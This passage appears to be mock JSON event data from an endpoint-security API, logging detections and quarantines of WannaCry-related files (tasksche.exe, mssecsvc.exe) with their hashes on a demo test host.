Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":776000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":745000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":730000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":620000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":355000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":308000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":293000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":277000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":230000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":184000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":152000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 